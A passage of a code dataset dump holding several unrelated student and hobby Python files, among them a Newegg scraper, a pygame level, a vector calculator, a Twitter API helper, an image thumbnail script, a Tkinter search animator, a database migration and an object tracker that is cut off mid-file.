productDict['A'], numOfProducts)\r\n\r\n if productSelection in 'BD':\r\n SSD_1TBUrlRating = \"https://www.newegg.com/p/pl?N=100011693%20600414920\"\r\n displayLowestPriceoftheBestRated(getPage(SSD_1TBUrlRating), productDict['B'], numOfProducts)\r\n\r\n if productSelection in 'CD':\r\n bestGPUsUrlRating = \"https://www.newegg.com/p/pl?N=100007709%20601321572%20600419577%20600565061%20601202919\" \\\r\n \"%20601203927%20601305993%20601203901%20601294835%20601295933%20601194948%20601330988\" \\\r\n \"%20601329884\"\r\n displayLowestPriceoftheBestRated(getPage(bestGPUsUrlRating), productDict['C'], numOfProducts)\r\n","repo_name":"mb19902/Newegg-Web-Scrape","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26540417797","text":"'''\n1. 처음 마이너스부터 다음 마이너스가 오기 전까지 + 는 모두 더해줘야 최소값이 나온다.\n2. 따라서, -를 기준으로 시작괄호를 열고, 다음 -가 나온다면 그때 괄호를 닫아주자.\n'''\n\n\nstring = input()\nsliceList = list(string.split('-'))\n\ntotalList = []\ntotalSum = 0\n\n# -로 구분한 문자열 리스트를 for문 돈다.\nfor i in sliceList:\n # +가 있는 문자열이라면 +로 split 해준다, split된 plustList는 모두 더해져 totalList에 더해진다.\n if '+' in i:\n plusList = list(map(int, i.split('+')))\n cnt = cnt(plusList)\n totalList.append(cnt)\n # +가 없는 문자열이라면 그냥 totalLIst에 더해준다.\n else:\n totalList.append(int(i))\n\n# totalList의 0번 인덱스를 totalSum으로 세팅, 나머지는 다 빼준다.\nfor i in range(len(totalList)):\n if i == 0:\n totalSum = totalList[i]\n else:\n totalSum -= totalList[i]\n\nprint(totalSum)","repo_name":"kkkapuq/AlgorithmStudy","sub_path":"Python/220708_BOJ_1541_잃어버린 괄호/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22626405924","text":"import sys\nsys.path.insert(0,'../')\nfrom levels import levels\nfrom constants import w_width, w_height, wolfPath, bearPath,colors\nimport enemy, items, backgrounds,sounds\nimport random, pygame, math, json\n\nclass level(levels):\n\n def __init__(self, screen):\n levels.__init__(self,screen)\n self.screen = screen\n # where the player will start on this level\n self.startingPosX = 600\n self.startingPosY = 350\n self.soundFX = sounds.SoundFX()\n \n with open('assets/images/levelTwo/level2obstacles.json','rb') as obstacles:\n self.obstacleCoords = json.load(obstacles)\n self.obstacleCoords['tm']= {\"x\": 500, \"y\": 300, \"height\": 150, \"width\": 150, \"path\": 'DNR'}\n\n self.obstacles = items.createObstacles(self.obstacleCoords)\n self.sink = items.getSink(self.obstacles)\n\n enemyStartX, enemyStartY = enemy.createPoints()\n wolf = levelEnemy((enemyStartX, enemyStartY),wolfPath,10)\n wolf1 = enemy.Enemy((enemyStartX, enemyStartY),wolfPath,7)\n bear = enemy.Enemy((enemyStartX, enemyStartY),bearPath,9)\n wolf2 = enemy.Enemy((enemyStartX, enemyStartY),wolfPath,10)\n bear2 = enemy.Enemy((enemyStartX, enemyStartY),bearPath,11)\n wolf3 = enemy.Enemy((enemyStartX, enemyStartY),wolfPath,3)\n bear3 = enemy.Enemy((enemyStartX, enemyStartY),bearPath,12)\n \n self.enemies = [wolf,wolf1,bear,wolf2,wolf3,bear,bear2,bear3]\n self.background = backgrounds.Background(2)\n\n def updateEnemies(self,keith,keys,crystalList,disabled,obstacles):\n keith.updateInvincible()\n if disabled == []:\n collision = False\n else:\n collision = False\n for pressed in disabled:\n if keys[pressed]:\n collision = True\n for e in self.enemies:\n\n if e.rectangle.colliderect(self.sink.rect):\n e.reverseHeading(self.sink)\n bumped = True\n else:\n bumped = False\n\n e.update(keith,self.background,keys,collision,obstacles,bumped)\n\n if(e.rectangle.colliderect(keith.rectangle) and keith.isInvincible == False):\n\n self.soundFX.playBloop()\n e.caughtHim = 1\n keith.onEnemyCollision()\n\n\n if(keith.itemsHeld > 0):\n keith.itemsHeld -= 1\n keith.updateSpeed()\n droppedBox = pygame.Rect((keith.rectangle.x - 1000 - self.background.x), (keith.rectangle.y -1000 - self.background.y), 41,36)\n droppedItem = items.Crystal(droppedBox)\n crystalList.append(droppedItem)\n else:\n keith.lives -= 1\n\n def draw(self,crystalList,sink,keith):\n self.screen.fill(colors['black'])\n self.background.draw(self.screen)\n self.drawEnemies(self.enemies)\n self.drawObstacles(self.obstacles,self.background)\n self.drawItems(crystalList,sink,self.background)\n self.drawText(keith,sink)\n self.drawDisplay(crystalList,sink,self.background)\n self.screen.blit(keith.image, keith.rectangle)\n\n\nclass vector():\n def __init__(self,x,y):\n self.x = x\n self.y = y\n\n def negateX(self):\n self.x *= -1\n\n def negateY(self):\n self.y *= -1\n\nclass levelEnemy(enemy.Enemy):\n\n def update(self,keith,bg,keys,collision,obstacles,bumped):\n if not collision:\n if keys[pygame.K_a]:\n self.rectangle.x += keith.speed\n if keys[pygame.K_d]:\n self.rectangle.x -= keith.speed\n if keys[pygame.K_w]:\n self.rectangle.y += keith.speed\n if keys[pygame.K_s]:\n self.rectangle.y -= keith.speed\n\n if self.detection.colliderect(keith.rectangle) and not bumped:\n self.chase(keith.rectangle)\n else:\n self.patrol(bg,obstacles)\n self.caughtHim = 0\n self.detection = self.rectangle.inflate(200,200)\n\n \n def chase(self,playerRect):\n \n if self.caughtHim == 1:\n self.rampage = 0\n self.detection = self.rectangle.inflate(400,300)\n return\n\n if self.rampage == 0:\n # increase detection range\n self.detection = self.rectangle.inflate(400,300)\n\n x = (playerRect.x - self.rectangle.x)\n y = (playerRect.y - self.rectangle.y)\n \n length = math.sqrt((x*x)+(y*y))\n try:\n self.headingX = float(x/length)\n except ZeroDivisionError:\n self.headingX = float(x/(length+1))\n try:\n self.headingY = float(y/length)\n except ZeroDivisionError:\n self.headingY = float(y/(length + 1))\n\n self.rampage = 1\n\n else:\n self.detection = self.rectangle.inflate(400,300)\n x = (playerRect.x - self.rectangle.x)\n y = (playerRect.y - self.rectangle.y)\n rampageSpeed = self.speed*1.7\n self.stepCounter-=1\n nextXPos = self.rectangle.x + (rampageSpeed*self.headingX)\n nextYPos = self.rectangle.y + (rampageSpeed*self.headingY)\n\n self.rectangle.x = nextXPos\n self.rectangle.y = nextYPos\n\n if y > 0: # player below\n self.move(self.down_states)\n elif y < 0: # player above\n self.move(self.up_states)\n elif x > 0: # player to right\n self.move(self.right_states)\n elif x < 0: # player to left\n self.move(self.left_states)\n \n if self.stepCounter <= 0:\n\n self.rampage = 0\n self.stepCounter = 50\n return \n\n self.image = self.sheet.subsurface(self.sheet.get_clip())\n\n","repo_name":"sabrinagannon/space-evaders","sub_path":"current version/levels/level2.py","file_name":"level2.py","file_ext":"py","file_size_in_byte":5923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9906870050","text":"\"\"\" a program to do basic vector calculations in 3 dimensions: addition, \r\ndot product and normalization\r\nAuthor: Dominic Manthoko\r\n21 April 2014\r\n\"\"\"\r\n\r\ndef v_add(A,B):\r\n \"\"\" function that adds two vectors together\"\"\"\r\n \r\n # sum the corresponding vector components together\r\n x_com = int(A[0]) + int(B[0])\r\n y_com = int(A[1]) + int(B[1])\r\n z_com = int(A[2]) + int(B[2])\r\n \r\n # add all the component additions\r\n add = [x_com, y_com, z_com]\r\n \r\n return add\r\n\r\ndef dot_product(A,B):\r\n \"\"\" function that calculates the dot product of two vectors \"\"\"\r\n \r\n # multiply the corresponding vector components\r\n x_com = int(A[0]) * int(B[0])\r\n y_com = int(A[1]) * int(B[1])\r\n z_com = int(A[2]) * int(B[2])\r\n \r\n mul = x_com + y_com + z_com\r\n \r\n return mul\r\n\r\n# need the math module in order to find the square root of something in the \r\n# v_norm function\r\nimport math\r\n\r\ndef v_norm(V):\r\n \"\"\" function to calculate the norm of a single vector \"\"\"\r\n \r\n # raise each vector component to the power of 2\r\n x_com = int(V[0]) ** 2\r\n y_com = int(V[1]) ** 2\r\n z_com = int(V[2]) ** 2\r\n \r\n # find the root of the sum of the vector components squared\r\n norm = math.sqrt(x_com + y_com + z_com)\r\n \r\n return norm\r\n\r\ndef main():\r\n # prompt the user to enter two vectors\r\n A = input(\"Enter vector A: \\n\")\r\n A = A.split()\r\n \r\n B = input(\"Enter vector B: \\n\")\r\n B = B.split()\r\n \r\n print('A+B = {}'.format(v_add(A,B)))\r\n print('A.B = {}'.format(dot_product(A,B)))\r\n print('|A| = {0:0.2f}'.format(v_norm(A)))\r\n print('|B| = {0:0.2f}'.format(v_norm(B)))\r\n \r\nif __name__ == '__main__' :\r\n main()","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_6/mntdom001/question2.py","file_name":"question2.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43937715875","text":"import requests\nimport os\nimport json\nimport pandas as pd\nimport time\nimport glob\nfrom twitter_scraper import cred\n\n#start_time=2020-05-25T17:00:00Z\n#end_time=2021-12-07T01:00:00Z\ndef create_url(start_time,end_time,user_id,next_token):\n # Replace with user ID below\n if next_token==None:\n return \"https://api.twitter.com/2/users/{}/tweets?max_results=100&start_time={}&end_time={}\".format(user_id,start_time,end_time)\n else:\n return \"https://api.twitter.com/2/users/{}/tweets?max_results=100&start_time={}&end_time={}&pagination_token={}\".format(user_id,start_time,end_time,next_token)\n\n \ndef get_params(paramlist=None):\n # Tweet fields are adjustable.\n # Options include:\n # attachments, author_id, context_annotations,\n # conversation_id, created_at, entities, geo, id,\n # in_reply_to_user_id, lang, non_public_metrics, organic_metrics,\n # possibly_sensitive, promoted_metrics, public_metrics, referenced_tweets,\n # source, text, and withheld\n if paramlist:\n params = \",\".join(paramlist)\n else:\n params = \"created_at,entities,in_reply_to_user_id,lang,public_metrics,source,author_id\"\n return {\"tweet.fields\": params}\n\n\ndef create_headers():\n bearer_token = cred.bearer_token\n headers = {\"Authorization\": \"Bearer {}\".format(bearer_token)}\n return headers\n\n\ndef connect_to_endpoint(url, headers, params):\n response = requests.request(\"GET\", url, headers=headers, params=params)\n print(response.status_code)\n if response.status_code != 200:\n raise Exception(\n \"Request returned an error: {} {}\".format(\n response.status_code, response.text\n )\n )\n return response.json()\n\n","repo_name":"shrutiphadke/adversarial_IN","sub_path":"twitter_scraper/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26169862291","text":"#!/usr/bin/python\n# coding:utf-8\n\nimport os\nimport glob\nfrom PIL import Image\nimport colorsys\nimport math\nfrom tools import deserialization, serialization, rgb_to_10\nfrom db import createDB\n\n\ndef get_dominant_color(image):\n\n # 颜色模式转换,以便输出rgb颜色值\n # image = image.convert('RGBA')\n\n image = image.resize((10, 10))\n color = image.getpixel((0, 0))\n return color\n # 生成缩略图,减少计算量,减小cpu压力\n # image.thumbnail((200, 200))\n\n # max_score = 0 # 原来的代码此处为None\n # # 原来的代码此处为None,但运行出错,改为0以后 运行成功,原因在于在下面的 score > max_score的比较中,max_score的初始格式不定\n # dominant_color = 0\n\n # for count, (r, g, b, a) in image.getcolors(image.size[0] * image.size[1]):\n # # 跳过纯黑色\n # if a == 0:\n # continue\n\n # saturation = colorsys.rgb_to_hsv(r / 255.0, g / 255.0, b / 255.0)[1]\n\n # y = min(abs(r * 2104 + g * 4130 + b * 802 + 4096 + 131072) >> 13, 235)\n\n # y = (y - 16.0) / (235 - 16)\n\n # # 忽略高亮色\n # if y > 0.9:\n # continue\n\n # # Calculate the score, preferring highly saturated colors.\n # # Add 0.1 to the saturation so we don't completely ignore grayscale\n # # colors by multiplying the count by zero, but still give them a low\n # # weight.\n # score = (saturation + 0.1) * count\n\n # if score > max_score:\n # max_score = score\n # dominant_color = (r, g, b)\n\n # return dominant_color\n\n\ndef cutFile(filePath):\n im = Image.open(filePath).convert('RGB')\n img_size = im.size\n\n w = img_size[0]\n h = img_size[1]\n\n x = 0\n y = 0\n vw = h if w > h else w\n vh = vw\n # print(\"尝试指定裁剪宽{0},高{1}\".format(vw, vh))\n x = w/4\n y = h/4\n # print(\"x:{0},y:{1}\".format(x, y))\n\n x = 0 if (x+vw) > w else x\n y = 0 if (y+vh) > h else y\n # print(\"修正后,x:{0},y:{1}\".format(x, y))\n # print(\"尝试指定裁剪宽{0},高{1}\".format(vw, vh))\n\n reg = im.crop((x, y, x+vw, y+vh))\n # reg.show()\n return reg\n\n\n(conn, c) = createDB()\n\n\ndef insertToDB(row):\n c.execute(\"INSERT INTO images VALUES ({0},{1},{2},'{3}',{4},{5},{6},'{7}','{8}')\".format(row['r'],\n row['g'],\n row['b'],\n row['path'],\n row['color'],\n row['width'],\n row['height'],\n row['name'],\n row['originPath']))\n pass\n\n\ndef originalProcess(path, thumbPath):\n i = 0\n if not os.path.exists(thumbPath):\n os.mkdir(thumbPath)\n\n for folder in os.listdir(path):\n t_folder = thumbPath+\"/\"+folder\n if not os.path.exists(t_folder):\n os.mkdir(t_folder)\n\n print('处理{}中...'.format(folder))\n\n for infile in glob.glob(sourcesFolder+\"/\"+folder+\"/*.*\"):\n f, ext = os.path.splitext(infile)\n try:\n img = cutFile(infile)\n img = img.resize(size)\n color = get_dominant_color(img)\n # print(\"图片色值:{}\".format(color))\n\n t_save_file = t_folder+\"/\"+str(i)+'.jpg'\n\n p = Image.new('RGB', [50, 20], color)\n # img.paste(p, (5, 5)) 取消上色\n\n # p.save(t_folder+\"/\"+str(i)+\".c.jpg\")\n img.save(t_save_file, \"JPEG\")\n\n colorStorage.append({'color': color, 'path': t_save_file})\n\n insertToDB({\n 'r': color[0],\n 'g': color[1],\n 'b': color[2],\n 'color': rgb_to_10(color),\n 'width': img.width,\n 'height': img.height,\n 'path': t_save_file,\n 'name': folder,\n 'originPath': infile\n })\n\n except Exception as e:\n print(\"Error: 读取文件失败:%s %s\" % (infile, e))\n\n i += 1\n\n\nsize = (300, 300) # 生成小图尺寸\n\nsourcesFolder = \"downloads/sources\"\nthumbnailFolder = \"downloads/thumbnail\"\n\ncolorStorage = deserialization('color-mapping.pkl')\n\nif(len(colorStorage) > 0):\n print('缓存存在:{}个图片'.format(len(colorStorage)))\nelse:\n originalProcess(sourcesFolder, thumbnailFolder)\n print('获取到:{}个图片,准备生成缓存插入数据库'.format(len(colorStorage)))\n serialization(colorStorage, 'result/color-mapping.pkl')\n\n for row in c.execute(\"select count(*) from images\"):\n print(row)\n\n conn.commit()\n conn.close()\n\n\nprint(\"完成! 一共有{0}个图片\".format(len(colorStorage)))\n","repo_name":"Restry/python-image-detect","sub_path":"createImageThumb.py","file_name":"createImageThumb.py","file_ext":"py","file_size_in_byte":5341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2006905096","text":"\n##\n## CS 4222/5222 Artificial Intelligence\n## Fall 2021\n##\n## Lab 2: path finding. This is the animation module for the graph\n## search algorithms\n##\n##\n\nimport math\nimport pickle\nfrom tkinter import *\nfrom tkinter.filedialog import askopenfilename\nfrom tkinter.messagebox import showerror\nfrom time import time, sleep\n\n\nfrom SearchProblem import *\n\n## spherical Mercator projection of lat/lon coords\ndef merc(coords,mapw,maph):\n x = (coords[1]+180)*(mapw/360.0)\n latRad = coords[0]*math.pi/180.0\n mercN = math.log(math.tan((math.pi/4.0)+(latRad/2.0)))\n y = maph/2.0 - (maph*mercN)/(2.0*math.pi)\n return (x,y)\n\n## transform coordinates from graph locations to fit on canvas\n## margin is pixels of padding from canvas bounding box\ndef transform(coords,graph,canvas):\n margin=50 \n wfactor = canvas.winfo_reqwidth() - 2*margin\n hfactor = canvas.winfo_reqheight() - 2*margin\n\n if graph.geo:\n maxproj = merc((graph.xmax,graph.ymax),wfactor,hfactor)\n minproj = merc((graph.xmin,graph.ymin),wfactor,hfactor)\n x,y = merc(coords,wfactor,hfactor)\n rx = wfactor/(maxproj[0]-minproj[0])\n ry = hfactor/(maxproj[1]-minproj[1])\n return (rx*(x-minproj[0])+margin,hfactor-ry*(y-minproj[1])+margin)\n else:\n x,y = coords\n rx = wfactor/(graph.xmax-graph.xmin)\n ry = hfactor/(graph.ymax-graph.ymin) \n return (rx*(x-graph.xmin)+margin,hfactor-ry*(y-graph.ymin)+margin)\n\nclass SearchAnimator:\n def __init__(self,algos):\n self.algos = algos\n \n ## Draw the graph on the main canvas\n def draw(self,graph):\n for v in graph.nodes():\n x1,y1 = transform(graph.locations[v],graph,self.canvas)\n for u in graph.dict[v]:\n x2,y2 = transform(graph.locations[u],graph,self.canvas)\n self.canvas.create_line(x1,y1,x2,y2)\n for node in graph.locations:\n x,y = transform(graph.locations[node],graph,self.canvas)\n self.canvas.create_rectangle( x-1, y-1, x+1, y+1, fill = \"gray\" )\n if len(graph.nodes()) < 50: self.canvas.create_text(x-2,y-2,text=node)\n\n ## Trace the path (list of nodes) in red on the canvas\n def draw_path(self,graph,path):\n coords = list(map(lambda v: transform(graph.locations[v.state],graph,self.canvas),path))\n x,y = coords[0]\n self.canvas.create_rectangle( x-3, y-3, x+3, y+3, fill = \"red\" )\n for xnext,ynext in coords[1:]:\n self.canvas.create_line(x,y,xnext,ynext,width=4,fill=\"red\")\n x,y = xnext,ynext\n\n ## Retrieve the solution from the path, calculate its cost and display\n def get_solution(self,graph,path):\n cost=0;\n statePath = list(map(lambda v: v.state,path))\n statePath.reverse()\n for i in range(len(statePath)-1):\n cost = cost+graph.get(statePath[i],statePath[i+1])\n self.pathCostStr.set(str(cost))\n\n ## Mark all the nodes in the fringe set with blue\n def draw_fringe(self,graph,fringe):\n coords = map(lambda v: graph.locations[v.state],fringe)\n for x,y in coords:\n x,y = transform((x,y),graph,self.canvas)\n self.canvas.create_rectangle( x-3, y-3, x+3, y+3, fill = \"blue\" )\n\n ## Mark all the nodes in the closed set with black\n def draw_closed(self,graph,closed):\n coords = list(map(lambda state: transform(graph.locations[state],graph,self.canvas),closed))\n for x,y in coords:\n self.canvas.create_rectangle( x-3, y-3, x+3, y+3, fill = \"black\" )\n\n ## Display the number of nodes generated since search began\n def display_nodecount(self):\n self.nodeCountStr.set(str(Node.nodecount))\n\n ## Callback registered with search algorithm to be called in each\n ## iteration to display the search state\n def callback(self,graph,node,fringe,closed,halt):\n self.canvas.delete(\"all\")\n self.draw(graph)\n self.draw_fringe(graph,fringe)\n self.draw_path(graph,node.path())\n self.draw_closed(graph,closed)\n self.display_nodecount()\n if halt: self.get_solution(graph,node.path())\n self.root.update_idletasks()\n sleep(self.speed.get())\n\n ## Create a search problem on the graph, with initial state and goal,\n ## and run the selected search algorithm\n def run_search_alg(self,graph):\n self.speedLabel['state']=DISABLED\n self.speedSlider['state'] = DISABLED\n prob = SearchProblem(self.start.get(),self.goal.get(),graph)\n self.pathCostStr.set(\"\")\n alg = self.algos[self.algo.get()]\n alg(prob,self.callback)\n self.speedLabel['state'] = NORMAL\n self.speedSlider['state'] = NORMAL\n\n def loadInstance(self):\n filename = askopenfilename() # show an \"Open\" dialog box and return the path to the selected file\n with open(filename,'rb') as f: self.graph= pickle.load(f)\n f.close()\n\n ## compute bounding box corners\n self.graph.xmin = min([x for (x,y) in self.graph.locations.values()])\n self.graph.xmax = max([x for (x,y) in self.graph.locations.values()])\n self.graph.ymin = min([y for (x,y) in self.graph.locations.values()])\n self.graph.ymax = max([y for (x,y) in self.graph.locations.values()])\n\n ## Populate menus\n self.startNodeMenu['menu'].delete(0,'end')\n self.startNodeMenu['state']=NORMAL\n self.startNodeLabel['state']=NORMAL\n for node in self.graph.nodes():\n self.startNodeMenu['menu'].add_command(label=node, command=lambda x=node:self.start.set(x))\n self.start.set(self.graph.default_start)\n self.goalNodeMenu['menu'].delete(0,'end')\n self.goalNodeMenu['state']=NORMAL\n self.goalNodeLabel['state']=NORMAL\n for node in self.graph.nodes():\n self.goalNodeMenu['menu'].add_command(label=node, command=lambda x=node:self.goal.set(x))\n self.goal.set(self.graph.default_goal)\n self.canvas.delete(\"all\")\n self.draw(self.graph)\n self.go.configure(command=lambda x=self.graph:self.run_search_alg(self.graph))\n self.go['state'] = NORMAL\n\n def run(self):\n ## Initialize environment\n self.root = Tk()\n windowWidth = 1200\n windowHeight = 700\n positionRight = int(self.root.winfo_screenwidth()/2 - windowWidth/2)\n positionDown = int(self.root.winfo_screenheight()/2 - windowHeight/2)\n\n # Positions the window in the center of the page.\n self.root.geometry(\"{}x{}\".format(windowWidth, windowHeight) + \"+{}+{}\".format(positionRight, positionDown))\n self.root.title( \"Search Animator\" )\n\n ## Set up canvas for input window\n self.canvas = Canvas( self.root, width=windowWidth-300, height=windowHeight )\n self.canvas.place(x=0,y=0)\n\n ## Set up canvas for control panel\n controlFrame = Frame(self.root, height=windowHeight-180,width=275,borderwidth=2,relief=SUNKEN)\n controlFrame.place(x=900,y=200/2);\n controlFrame.propagate(0)\n self.control = Canvas(controlFrame)\n self.control.pack(expand=YES,fill=BOTH)\n\n\n ## Start node menu (this needs to be populated after load)\n self.start = StringVar(self.root)\n self.startNodeMenu = OptionMenu(self.control,self.start,None)\n self.startNodeMenu.grid(row=2,column=2,sticky=W,padx=5,pady=5)\n self.startNodeLabel = Label(self.control,text=\"Start:\")\n self.startNodeLabel.grid(row=2,column=1,sticky=E,padx=5,pady=5)\n self.startNodeMenu[\"state\"]=DISABLED\n self.startNodeLabel[\"state\"]=DISABLED\n\n ## Goal node menu (this needs to be populated after load)\n self.goal = StringVar(self.root)\n self.goalNodeMenu = OptionMenu(self.control,self.goal,None)\n self.goalNodeMenu.grid(row=3,column=2,sticky=W,padx=5,pady=5)\n self.goalNodeLabel = Label(self.control,text=\"Goal:\")\n self.goalNodeLabel.grid(row=3,column=1,sticky=E,padx=5,pady=5)\n self.goalNodeMenu[\"state\"]=DISABLED\n self.goalNodeLabel[\"state\"]=DISABLED\n\n ## Algo menu\n #self.algos = [\"graph search\", \"BFS\", \"DFS\", \"greedy best-first\", \"A*\", \"IDS\"]\n\n ## self.algos is a dictionary of search functions keyed by string\n self.algo = StringVar(self.root)\n self.algo.set(list(self.algos.keys())[0])\n self.algoMenu = OptionMenu(self.control,self.algo,*self.algos.keys())\n self.algoMenu.grid(row=4,column=2,sticky=W,padx=5,pady=5)\n Label(self.control,text=\"Algo:\").grid(row=4,column=1,sticky=E,padx=5,pady=5)\n\n self.graph=None\n\n ## Go button\n self.go = Button(self.control,text=\"Go\",width=10)\n self.go.grid(row=1,column=1,sticky='w',padx=5,pady=5)\n self.go[\"state\"] = DISABLED\n self.go.propagate(0)\n\n ## Load button\n self.load = Button(self.control,text='Load',width=10,command=self.loadInstance)\n self.load.grid(row=1,column=2,sticky='w',padx=5,pady=5)\n self.load.propagate(0)\n\n ## Nodes generated display\n self.nodeCountStr = StringVar(self.root)\n Label(self.control,text=\"Nodes generated:\").grid(row=5,column=1,sticky=E,padx=5,pady=5)\n Label(self.control,textvariable=self.nodeCountStr).grid(row=5,column=2,sticky=W,padx=5,pady=5)\n self.nodeCountStr.set(\"0\")\n\n ## Solution cost display\n self.pathCostStr = StringVar(self.root)\n Label(self.control,text=\"Solution cost:\").grid(row=6,column=1,sticky=E,padx=5,pady=5)\n Label(self.control,textvariable=self.pathCostStr).grid(row=6,column=2,sticky=W,padx=5,pady=5)\n self.pathCostStr.set(\"\")\n\n self.speed = DoubleVar(self.root)\n self.speedLabel = Label(self.control,text=\"Speed:\")\n self.speedSlider = Scale(self.control,from_=1,to=0.01,resolution=0.01,variable=self.speed,orient=HORIZONTAL,\n showvalue=False)\n self.speed.set(1)\n self.speedLabel.grid(row=7,column=1,sticky=E,padx=5,pady=5)\n self.speedLabel.propagate(0)\n self.speedSlider.grid(row=7,column=2,sticky=W,padx=5,pady=5)\n self.speedSlider.propagate(0)\n\n self.root.mainloop()\n\n","repo_name":"joseoliveirajr/ai-labs","sub_path":"lab-2/SearchAnimator.py","file_name":"SearchAnimator.py","file_ext":"py","file_size_in_byte":10188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27979516685","text":"\"\"\"Criação da tabela Token\n\nRevision ID: 2c1f48dfecb6\nRevises: 48939ecf5a5d\nCreate Date: 2021-04-19 22:43:19.241253\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '2c1f48dfecb6'\ndown_revision = '48939ecf5a5d'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('token',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('nome', sa.String(length=100), nullable=False),\n sa.Column('token', sa.Integer(), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('token')\n # ### end Alembic commands ###\n","repo_name":"brunopetinati/Capstone-Q3","sub_path":"migrations/versions/2c1f48dfecb6_criação_da_tabela_token.py","file_name":"2c1f48dfecb6_criação_da_tabela_token.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28215548050","text":"import os\nimport time\nfrom queue import Queue\n\nimport cv2\nimport numpy\n\nfrom detector import Detector\nfrom extractor import Extractor\nfrom yolov5.utils.plots import plot_one_box\n\n\nclass Tracker():\n def __init__(self, args):\n self.detector = Detector(weight=args.yolov5_weight, persist=True)\n\n self.extractor = Extractor(weight=args.feature_net_weight, arch=args.feature_net_arch)\n self.feature_net_arch = args.feature_net_arch\n\n self.input_path = os.path.join(args.input_path)\n filename = os.path.basename(self.input_path)\n self.output_path = os.path.join(args.output_path, str(args.threshold1) + \",\" + str(args.threshold2) + \",\" + str(\n args.threshold3) + \",\" + str(args.threshold4))\n if not os.path.exists(self.output_path):\n os.makedirs(self.output_path)\n self.output_path = os.path.join(self.output_path, filename)\n self.threshold1 = args.threshold1\n self.threshold2 = args.threshold2\n self.threshold3 = args.threshold3\n self.threshold4 = args.threshold4\n\n self.video_type_dict = {\n \".mp4\": \"mp4v\",\n \".avi\": \"pimi\",\n \".ogv\": \"theo\",\n \".fly\": \"flv1\"\n }\n\n self.target_img_path = args.target_img_path\n self.positive_feature_buffer_maximum = 20\n # 正样本缓冲区\n self.positive_feature_buffer = None\n # 原始正样本特征, 优先级高于缓冲区正样本所有正样本\n self.positive_feature0 = None\n\n def compute_distance(self, features, type=0):\n \"\"\"\n 计算检测目标和正样本缓冲区的所有样本的加权平均距离\n 0.权重平均模式:\n 平均计算权重\n 1.权重递增模式:\n 该模式侧重于平滑镜头目标的关联性,但可能会导致检测一旦失误,后续会逐渐将误差放大。\n 2.权重递减模式:\n 该模式侧重于镜头突变目标的关联性,但对于平滑镜头中目标的关联性不如1模式\n 计算距离中原始图片特征规定,一定会用作距离计算。\n :param features: 目标检测特征\n :param type: 权重模式\n :return: 原始正样本距离,正样本缓冲区加权距离\n \"\"\"\n\n ###############################原始正样本的距离###########################################\n distance0 = features - self.positive_feature0\n distance0 = distance0 ** 2\n distance0 = numpy.sum(distance0, axis=1)\n\n ###############################正样本缓冲区的加权距离###########################################\n if type == 0:\n weights_matrix = [[1] for weight in range(1, len(self.positive_feature_buffer) + 1)]\n elif type == 1:\n weights_matrix = [[weight] for weight in range(1, len(self.positive_feature_buffer) + 1)]\n else:\n weights_matrix = [[weight] for weight in range(len(self.positive_feature_buffer), 0, -1)]\n\n # 权值矩阵\n coefficient = 1\n weights_matrix = numpy.array(weights_matrix) ** coefficient\n\n distances = []\n for positive_feature in self.positive_feature_buffer:\n distance = features - positive_feature\n distance = distance ** 2\n distance = numpy.sum(distance, axis=1)\n distances.append(distance[None])\n distances = numpy.concatenate(distances, axis=0)\n distances = distances * weights_matrix\n\n if type == 0:\n average_distance_with_weights = numpy.sum(distances, axis=0) / len(self.positive_feature_buffer)\n else:\n count = 0\n for i in range(1, len(self.positive_feature_buffer) + 1):\n count += i ** coefficient\n average_distance_with_weights = numpy.sum(distances, axis=0) / count\n\n return distance0, average_distance_with_weights\n\n def track(self):\n cap = cv2.VideoCapture(self.input_path)\n\n input_fps = cap.get(cv2.CAP_PROP_FPS)\n video_length = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n\n ret, frame = cap.read()\n\n ending_frame = 100\n ending_frame = video_length\n\n output_fps = input_fps / 1\n video_type = os.path.splitext(self.output_path)[-1]\n fourcc = cv2.VideoWriter_fourcc(*self.video_type_dict.get(video_type))\n out = cv2.VideoWriter(self.output_path, fourcc, output_fps, (frame.shape[1], frame.shape[0]))\n\n current_frame = 0\n\n # 原始目标的图片、特征\n target_img = cv2.imread(self.target_img_path)\n target_img_feature0 = self.extractor.extract([target_img, ]).cpu().detach().numpy()\n current_target_img_feature = target_img_feature0\n\n # 正样本缓冲区\n self.positive_feature_buffer = current_target_img_feature\n # 原始正样本\n self.positive_feature0 = target_img_feature0\n\n while cap.isOpened() and ret == True and current_frame <= ending_frame:\n tic = time.time()\n\n canvas = frame\n canvas, boxes = self.detector.detect(canvas)\n\n sub_canvases = []\n\n for i, box in enumerate(boxes):\n sub_canvas = canvas[box[1]:box[3], box[0]:box[2], :]\n # cv2.imwrite(\"images/\" + str(i) + \".jpg\", sub_canvas)\n sub_canvases.append(sub_canvas)\n\n \"\"\"\n 这里有几个阈值:\n 1.原始正样本追踪阈值阈值 <= 2.原始正样本存储阈值\n 3.正样本缓冲区追踪阈值 > 